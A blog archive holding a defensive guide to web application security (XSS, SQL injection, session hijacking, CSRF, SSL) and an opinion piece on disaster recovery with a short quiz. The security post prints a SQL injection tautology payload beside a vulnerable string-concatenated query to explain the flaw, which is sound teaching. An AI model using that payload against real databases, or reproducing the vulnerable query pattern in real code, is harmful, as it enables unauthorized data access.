Category Archives: TechmixerUniversity

Website Security Engineered into the Design


The Challenge

A website is open to the public on an anonymous basis.  It must be easy to use, but also protect both the user and the business.  A website which does not deploy reasonable security precautions is open to hacking.  Hacking is not mysterious and in some cases may be done quite easily, but can result in the following huge problems:

  • The site displaying unwanted or inappropriate messages
  • The users web identity being hijacked
  • A loss of critical data for the company
  • Public loss of confidence

A site’s security depends upon many components from the IT infrastructure down to the user’s desktop.  This discussion will assume all appropriate environment controls are in place and effective.  And the user has taken reasonable precautions.   The focus will be on the most common vulnerabilities in public facing web applications and the best practices to close the gaps.  However, there is no single countermeasure that will guarantee web security.  However, a suite of careful protections that is designed into the web architecture can deliver a reasonable level of security.

Unfortunately, HTML was originally used to simply markup documents; then, the use was expanded dramatically on the web.  Thus, by tasking it beyond its original design, many vulnerabilities have surfaced which can easily be exploited unless specific safeguards are deployed.

There are many good benchmarks for web application security designs from the SANS Institute, MITRE, and Open Web Application Security Project (OWASP) 3.0.  These guides show the most common problems and generally accepted best practice solutions.  The following discussion drills down into some of the key problem issues that often result from coding, design, or implementation errors or omissions.  The goal herein is to show how vulnerability within web applications can be limited or even prevented.  Here are the most common vulnerabilities and their reported occurrences:

Common problems

A website can be made vulnerable to attack either through ignorance, bad design, or sloppy implementation.  In some cases, the website builder is just not aware of the gaps in HTML.  A site that is well designed from the ground up with the common problems in mind will have few problems.  But it all requires careful and thoughtful implementation and testing for a complete security umbrella.  Some of the most common issues that a good design must guard against are:

  • Failure to preserve the web page integrity which opens the door for the insertion of cross site scripting (XSS).  This occurs whenever a site accepts input directly without sufficient validation.  The malicious input is typically a script which can steal the user’s session identity, display unauthorized messages, and/or collect unauthorized data.  The injection is typically done with short scripts using common languages, such as javascript.  The vulnerability exploits the trust the user has in an existing site.  The approaches are:
    • Non-persistent or reflected –script commands used immediately to generate page content to collect information about the site.
    • Persistent or stored – script commands imbedded in comments on a site to collect information about other users
    • DOM (Document Object Model) – client-side hijacking during the assembly of the html, typically with error messages.

A typical example:

  • Failure to preserve SQL query structure (SQL injection) within the page.  This occurs most commonly where a site uses resolved SQL commands to collect data from a host database.  This is where the SQL commands contain variables which are populated by user input.  However, the attacker realizes this by examining the page source; then inputs additional commands as the input.  The input simply terminates the existing SQL command prematurely and inserts their request with valid SQL query structure.  The newly expanded SQL query is included in the execution of the original SQL code, which returns the information the attacker requested.  This gives an attacker an opportunity to search the site database for progressively deeper and deeper information.  Items that can be retrieved and/or modified include:

 

  • List of users
  • User credentials
  • Change user’s email

 

Input: username

“’’ or ‘1’=’1’

statement = “SELECT * FROM users WHERE name = ‘” + userName + “‘;”

becomes SELECT * FROM users WHERE name = '' OR '1'='1';

 

 

 

  • Inadequate session management invalidates the authentication and rights controls for the website usage.  When a user is initially authenticated upon entering a site, they are provided a session ID (SID).  However, the challenge is how to store and pass the SID between pages as the user navigates the site.  This is necessary because HTML is essentially stateless without additional controls.  There are 3 methods to provide state to a set of pages:
    • Get Method.  This simply passes the  ID in the query strin http://mysite.com/page1.aspx?session=123456789
    • Post Method.  In this case, the SID is contained in the input, select, and text form tag in the html page.
    • Cookie.  This writes the SID to the local browser temporary space.  Modern browsers do a better job of restricting access to the SID to only the authorized and originating site, but older browsers have big gaps.  However, the access control significantly depends upon the data in the Cookie.

All of these methods can be made secure or insecure depending upon the application.   According to the SANs institute, “all of the methods can be made reasonably secure through intelligent design.”

The vulnerability exists when a valid SID is stolen or an imposter SID is created.  The goal of many of the site attacks is purposely to get a SID.  In other cases, weak sites are developed with downloaded widgets to create the site SIDS; however, the construction of SIDS using public domain tools is often predictable.  There are several web resources available to show the construction of SIDs for many popular web frameworks.

  • Cross-site request forgery (or CSRF) is where the user’s browser is tricked into sending unauthorized requests to a target site on the user’s behalf without any action on the part of the user.   A malicious instruction set is placed in a public forum, often in an image, which gives hidden instructions to the browser acting as a deputy for the user.  As an example, the scripts can request the browser to:
    • logon to sites on behalf of the user
    • send out weak stored passwords and SIDs
    • engage transactions

Fortunately, the most damage CSRF can inflict is only when the user is simultaneously logged onto the attacking site and the target site.  However, multiple site browsing is common.

  • Clear text transmission of sensitive information can expose both user and site data.  This problem can arise either between the desktop browser and web; or between the web server and the database host.  The most critical zone is the public internet space between the end user and the website.  While in route the data can travel through many hops and be deposited many caches and logs.  This is where it is vulnerable to sniffers and other monitors.

 

 

Application Best Practices

The following are common methods used to minimize the most common web vulnerabilities.  There is not one single element that will make a website secure; however, when taken in combination with active monitoring, a website can be made reasonably secure.  A website must be designed to:

Contain strong field validations on ALL input

All inputs must be validated.  The simple form of validating using escaping of string input is a good start, but it is not sufficient.  This is the process of simply replacing the 5 significant html characters.  Unfortunately, the scripting variations are too complex and clever. 

  • The simplest control is to limit the field size for ONLY the expected input.  The inputs must be validated for length, type, and syntax before being used or displayed.
  • Then only look for and accept the values expected (referred to as a white list).  As it has not proven to be successful to sanitize the input, it is best to simply reject invalid input.
  • And if still needing additional validation, use the Microsoft .Net XSS Library 1.5

As it is impossible to eliminate the use of cookies, the cookies must be protected as much as possible.  The cookies can be set to only allow access to the originating IP and for http only requests.  However, there are still exceptions around these protections. 

Use a strong output encoding for all pages generated such as (such as ISO 8859-1 or UTF 8). Do not allow the attacker to select it.

Deploy a Strong Session Management Strategy

Building in a strong session management approach will significantly limit the exposure if the site is penetrated by one of the other vulnerabilities.  And conversely, no additional controls, including encryption, can compensate for weak session management.  The basic logon controls usually start out solid, but often times the gaps occur when implementing ancillary functions such as logout, timeout, remember me, and keep alive.  The best methods for maintaining control of the session are:

  • Store only general information in the SID.  Even if hashed, do not store any user credentials as part of the SID.
  • If using the GET METHOD, use referrer filtering.  This simply means washing each page through a link filter page so the referring page is dropped.  Without this step, the SID remains part of the page because of the referring page.  However, some graphics and advertisements can still thwart this protection.
  • Verify that public error message and crash dumps do not contain the SID.
  • Automatically expire SIDs after a period of inactivity or absolute time.  This also means not allowing users to inherit an existing open SID or provide a SID.  If the user logs on and a SID is still open, it must be expired and a new one generated.  A site must be ‘strict’ about assigning a unique SID to each user.  (A permissive site accepts user supplied SIDs or allows inheriting SIDs.)  The reason sites do not allow multiple concurrent logons is to make it possible to determine if a SID has been stolen or duplicated.
  • Use a strong SID construction of at least 32 characters. This means there 2.27e(57) number of possible combinations – that is sufficient.  It is best to use built in SID generators that come with many of the popular platforms and avoid home grown controls or downloaded widgets.
  • Manage the generated SIDs on the server side within a database.  Do not store them in a temporary location subject to alternate rights authentication.  It is best to also hash the SIDs within the database to force their use only through the application.
  • Build in a logging and alerting system to record attempted uses of expired SIDs.  This will aid in the detection of a site attack and also identify the presence of a DoS (Denial of Service) attack.  This is accomplished by sending invalid SIDs to the system to force the logout of legitimate users.
  • Every page should have a ‘Logout’ button which is clearly displayed.  Too many sites in their effort to keep users on the site make the logout button difficult to find.  Thus, all too many users simple close the browser window and rely upon the SID timeout.

Deploy Forging Prevention

A site must recognize that it may be subject to automated actions on behalf of users.  These CSRF actions often have tell-tale signs that can be recognized and stopped.  A site is less exposed to unauthorized deputy actions when it:

  • Does not rely solely upon a cookie
  • Requires and validates the HTML referrer.  This is the tag in each request showing the page where the user request originated.
  • Uses of additional transaction confirmation authentication.  This is common when changing a password, but can also be used upon confirmation of a final purchase or action.  The use of multiple factor authentication such as a random picture code effectively disables unattended scripted actions. 

Use Secure Socket Layer (SSL)

In today’s world, secure transmission is largely handled by Secure Socket Layer (SSL).  This is a 3rd party certificate used to encrypt the data in transit.  It is observed with an https: address.  This virtually handles the communication in the public internet zone.  However, it does not handle the connection between the web and the database host.  This connection can be secured by using a closely routed switched network and setting the NIC interfaces to non-promiscuous mode.  In this manner, internal networks are substantially secure (except for WAN).  However, some implementations are looking at transmission encryption on the backside.  This can be done with Microsoft’s transparent data encryption for SQL 2008 (TDE).

Explore Alternative Measures

In some cases, users may opt to suspend scripting on their browser.  However, this eliminates much of the modern functionality demanded for usability.  There are domain/zone based controls for client-side scripting but this requires advanced knowledge and skills that are usually unavailable to the average user.  So scripting is probably here to stay, but a site can still educate the users on best practices and show them how to properly identify the official site.

Use Intermediary Page Generation Handlers

For new websites, the best approach is to architect the site engine to use an intermediary page assembler.  This processor accepts only expected input parameters, consumes the XML data from various sources, adds static content, and then responds with the HTML page.  The user inputs from the browser are never directly used by the page or SQL.  Instead, the specific user inputs are validated and used in a managed replacement process to generate dynamic actions.  This buffer not only makes it difficult for the attacker to see how the variables are used, but prevents unexpected inputs from getting into the final assembly and being executed.   An example of this secure modular web framework is used by Planserve Data Systems.

 

Conclusion

The purpose of this discussion is to help application developers avoid the common issues when designing, coding, and implementing an external facing web application.   These items must be considered before the first page is constructed or the site colors picked.

Before going into production, every website should be subjected to a thorough ‘penetration’ test.  There are several 3rd parties and tools which can be used to conduct an independent test.  However, it is costly and difficult to address vulnerabilities found at late stages of a web deployment project.  Any mitigation steps at that point are likely to be patchwork workarounds which will either fail or introduce other vulnerabilities. 

In order to prevent this project nightmare, the discussion here presented methods to address or mitigate the common vulnerabilities during the initial design and architecting of the site.  The site security must be baked in from the initial design all the way through to the final implementation.  If these key measures are implemented in a structured manner, the site will be reasonably secure.

 

References

 

http://msdn.microsoft.com/en-us/library/aa973813.aspx

http://en.wikipedia.org/wiki/Cross-site_scripting

http://www.sans.org/reading_room/whitepapers/webservers/secure-session-management-preventing-security-voids-web-applications_1594

http://www.bestsecuritytips.com/xfsection+article.articleid+169.htm

http://www.cgisecurity.com/owasp/html/guide.html#id2843025

http://www.owasp.org/index.php/Top_10_2007

http://www.acunetix.com/websitesecurity/xss.htm

www.planserve.net

www.hackthissite.org

Disaster Recovery is dead


If your IT shop is less than perfect, you are already an expert in disaster recovery at many levels.  The reason is the faulty way applications have traditionally been implemented.  This means continuing to spend more and more time with recovery efforts, but still not often getting the results the business demands.  The disaster recovery plans are a lot like elephant repellant in New York city; the effectiveness remains really unknown until it is too late.  Fortunately, disaster recovery will no longer be needed after the end of 2011.

The doubters will be quick to point out high availability is now a standard business expectation.  The systems have to stay up.  The perceived demands on IT continue to inflate.  But what is the business really demanding?  Do the customers really want to pay for it? Or is the overhead of disaster recovery just to avoid employee inconvenience or to provide executives with plausible deniability?  The challenge is IT staffs have fallen into a tradition of separating application design, implementation, and recovery.   The failure of this approach is catastrophic:

  • Budget-minded small to midsized businesses (SMBs) once viewed business continuity (BC) planning as an expensive luxury. Not anymore. Upgrading disaster recovery (DR) capabilities is a major priority for 56% of IT decision makers in the U.S. and Europe, according to Forrester Research Inc.‘s.
  • While companies think they’re immune to any long-term outage, more than one-fourth of companies have experienced a disruption in the last 5 years, averaging eight hours, or one business day. Source: Comdisco Vulnerability index
  • The U.S. Department of Homeland Security says one in four businesses won’t reopen following a disaster.

But what is a Disaster Recovery Plan?  If you ask IT staff, it is rebuilding boxes.  If you ask, the communications manager, it is re-establishing connectivity.  If you as the PM, it is a large collection of nicely formatted documents.  So which of the following is a disaster recovery plan?

  • Backup Tapes
  • Document
  • Software
  • Contracts
  • Recovery site
  • Server Virtualization

Perhaps, we find that it is really none of the above.  The individual items will lead us to an overly narrow view of the effort.  And lead us away from the business.  We will find that an ounce of prevention is worth a terabyte of cure.

In order to better understand of the needs of recovery, we need to first look at the types of disasters and the likelihood of each occurring.  We are all familiar with the dangers of a hurricane – obviously bad for business.  But what is equally as damaging is a business user posting the same address to all participants or dropping a billing table.  Which is more likely to occur on our watch?  Should the recovery effort really be any different?  The new view of disaster recovery will address both situations with the same solution.

 

To address these needs, there are various types of recovery strategies.  In fact, ALL companies have a fully functioning disaster recovery plan; the only difference is the result the plan achieves.   The following are common types of plans.  In order to protect the guilty, the businesses using each have been omitted.

  • Denial
  • Bunker
  • Copy
  • Nuclear
  • Active (right answer)

Which type of plan do you believe you have?  Do all members of your company have the same impression?  Incredibly, more than 44% of the companies with a workable disaster recovery plan have NOT informed anybody about the plan?  Why?  Is it because they don’t believe it will work or don’t want to take responsibility for it?  It is easy for the CEO to buy into the idea that they have done their ‘due diligence’ by spending a ton on a nuclear scheme.  But is spending a real bench mark for recovery?  In fact, some of the best recovery plans can be done quite affordably.  The key is to have an active resilience plan that is utilized on a daily basis.

It is the business…stupid.  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  What of the following should we be focusing on?

  • Backups
  • Disaster Recovery
  • Business Continuity (right answer)

The most powerful metric:  “Are you trying to avoid employee inconvenience with your requested service levels?”  IT staff are all too often the guy with the hammer looking at all problems as nails.  We forget that business was dutifully conducted before faxes, emails, ETL, and mobile phones.  What is really critical to the business?  And how can it be done in a pinch with a manual solution?  All too often the first question is how do we replicate the databases all over the planet, when the question we should be asking is:  how can we call the customers?  The real need is to establish business continuity.

We can distill the needs by looking at common terms in the recovery business.  But we cannot accept the representations of the primary uses as gospel.  All uses will say their functions must be 100% at all times with no possibility of any data loss: really?  But this is seldom the truth from a core business perspective.

  • Recovery Time Objective – Time required to recover critical systems to a functional state, often assumed to be “back to normal” for those systems designated as mission critical.
  • Recovery Point Objective – Point in time to which the information has been restored when the RTO has elapsed and is dependent upon what is available from an offsite data storage location.

 

The Test

A great test is to ask the staff if they are willing to take a 10% pay decrease to build out a nuclear infrastructure.  When faced with making the decision personal, it is amazing the clever workarounds people are capable of.  This forces the conversation away from how to build bigger IT plants to how achieve business continuity. 

Another overlooked test is to ask the customer.  But you have to ask the customer the right way.  If you simply ask if they want everything all the time, then the answer will be yes.  But say, if you gave your bank customer the following options:

  • Be guaranteed they can access their account 24×7, but have fees of $200 a month (the fees are there whether advertised or not).
  • Have a strong availability but accept if the access is down from time to time, but they will get a credit of $400 a month in their account (yes the swing is 2x).

Some recovery experts suggest categorizing applications.  They are usually project managers or consultants looking for work.  Or we can break out a crystal ball and try to prioritizing the impact.  This usually results in a massively huge cost (think infinity).  This approach is widely used by hardware sales agents trying to sell a nuclear gizmo.  However, this thinking is flawed in that more and more portal data is interconnected.  A portal may consume both high priority and low priority data.  But has your portal been tested to function WITHOUT the low priority data?  A silo view is no longer practical because virtually everything is interconnected.

So then, should we simply replicate everything?  Well, although more and more shops technically have all of their data replicated to a DR location, it is not readily usable by applications because it is not in sync. As a result, database administrators and application specialists need to spend additional hours, sometimes days, reconciling data and rolling databases back to bring the various data components into alignment. By the time this effort is complete, the desired recovery window has long since been exceeded.

The hard part is not rebuilding the box.  The most common mistake businesses make when determining service-level requirements is trying to keep the business running as if nothing happened.  The point is not that some new cool technology like clouds and SANs are not useful, but rather that the usage needs to be designed into the application deployment.  If it is designed as an afterthought and assigned to another department, the costs will rise and the effectiveness will drop.

You have to make sure your disaster recovery plan will work with or without the internal key people who developed it. If the director in charge of financial ERP applications wrote the plan, for example, ask the business intelligence manager to test the recovery.  The biggest bottleneck to any recovery is not the applications or the data, but rather the key people who know how the proprietary tools were configured for your shop.  If a hurricane hits, your staff needs to be focused on their families, not your CRM systems.

The secrets to success

  • Build resiliency into the design – Keep the architecture simple.
  • Build before planning
  • Reverse the offsite co-location so that the primary location is remote and the recovery is local.
  • Include key vendors in the plan so that they can provide assistance.
  • Use offshore resources to daily validate and bring current secondary sites on a daily basis – routine failovers.
  • Make high availability the responsibility of everyone – business and IT.

 

The secrets to failure

  • Depend upon familiar local resources
  • Plan before building
  • Use complex technology that inserts more moving parts into the daily operations
  • Prepare thick complex manuals.
  • Designate a special recovery team
  • View the recovery in terms of hardware
  • Test the process annually over a 1-2 day period.
  • Forget unique needs of legacy applications.
  • Assume each application is an independent silo

Where should you spend money?  Too often, IT staffs have discussed IT disaster recovery in terms of recovering servers rather than business value.  We are all familiar with the extreme costs of moving from .99 of uptime to .9999.  But let’s say it a different way:  it is easy to overspend trying to eliminate short downtimes.  In reality, the business impact is fairly low.  And we probably do not spend enough making darn sure we can avoid long term downtimes.  Ironically, many of the nuclear solutions insert so many moving parts to allow us to be instantly available, that when they fail, we are usually down for days or weeks.  It is easy to under spend trying to protect from the big impacts.

Where to spend too much money?

  • Overprotecting data that is not critical to the business daily needs
  • Fail to maintain disaster recovery plans
  • Test disaster recovery plans too often
  • Overlook the benefits of server virtualization
  • Reluctance to renegotiate with disaster recovery service providers
  • Rely on technology as a silver bullet
  • Engage a consultancy to do a detailed plan

 

How to save money?

  • Identify all of the costs
  • Determine the assumptions
  • Review the cost allocation
  • Build the recovery cost into the implementation

Clearly, the costs for distinct disaster recovery spending are trending upward.  It is going up, because it cannot deliver the results.  When we have the recovery effort assigned to a separate team or department, the right people are not bearing the costs of the availability.  And thus we cannot get unbiased feedback on the real needs.  As the costs for availability become baked into implementations, the costs as a separate line item evaporate.  And the overall spend actually is reduced because it is cheaper to build it in once, than design and implement it twice.

 Thus, new implementations will bake in the appropriate resilience making disaster recovery obsolete.  This will be the final step in the evolution of recovery:

Can recovery be a disaster?  Whether in a test or an actual recovery, the plan itself can be a substantial security risk.  During the process, the protected data is outside of its normal zone and subject to unexpected events as well as organized threats.  Companies go to great lengths to protect the PII (personal identifying information) within their data centers, but overlook the issues during a recovery effort.  Some are flat out unavoidable!

  • How to get data to facility?
  • How to recover licenses?
  • How to recover keys?
  • Where are passwords?
  • What happens to data after the test?
  • Were any data transmissions logged?

 

So as an executive, what can you do to do a quick stock take without hiring an expensive consultant?  Here is a handy executive checklist:

  • What constitutes a disaster?
  • Do all senior managers understand their role in the event of a disaster?
  • How will the interim business be managed?
  • How will public relations be managed?  How will staff communications be managed?
  • How will customers react?  Do they really want to pay for .9999?
  • What are the core business deliveries?  What can be performed through alternative manual means?
  • How much will downtime affect the share price and market confidence?
  • How will the recovery effort be staffed?
  • What is the resiliency of the solutions purchased?
  • What is the PII exposure during a recovery effort?

  

A checklist to see what you learned

1)      Organizations should lay out a five-year plan with a recovery time objective that is ________a. Less than two hours
b. Going to improve over time
c. The same as what you have now

2)      Of the 50% to 70% of organizations that develop IT disaster recovery plans, fewer than ____ actually test those plans.a. One quarter
b. One third
c. One half

3)      44% of disaster recovery planners polled haven’t told anybody that a DR plan exists in their organization.True
False

4)      How do current budget constraints change IT disaster recovery discussions with other parts of the business?a. They don’t — IT should proceed as it has before.
b. It makes it more important to involve other business departments.
c. It makes it less important to involve other business departments.

5)      The test of an IT disaster recovery plan came fast and furiously last year a gas and electric company, when flood waters swept over its Cedar Rapids, Iowa, territory. What technology, not touted as a big piece of the IT disaster recovery plan, came to the rescue?a. Voice over Internet Protocol
b. Desktop virtualization
c. Duplication services

6)      The recession is putting a squeeze on budgets for outsourcing disaster recovery services. As such, CIOs are turning to _________ to reduce floor space at their leased recovery sites, according to providers of IT disaster recovery services.a. Server virtualization
b. Cloud computing
c. Contract renegotiation

7)      How are companies using cloud computing for IT disaster recovery outsourcing?a. They’re increasing the number of licensees with access to DR applications.
b. They’re moving mission-critical applications to a cloud environment.
c. They’re creating carbon copies of applications.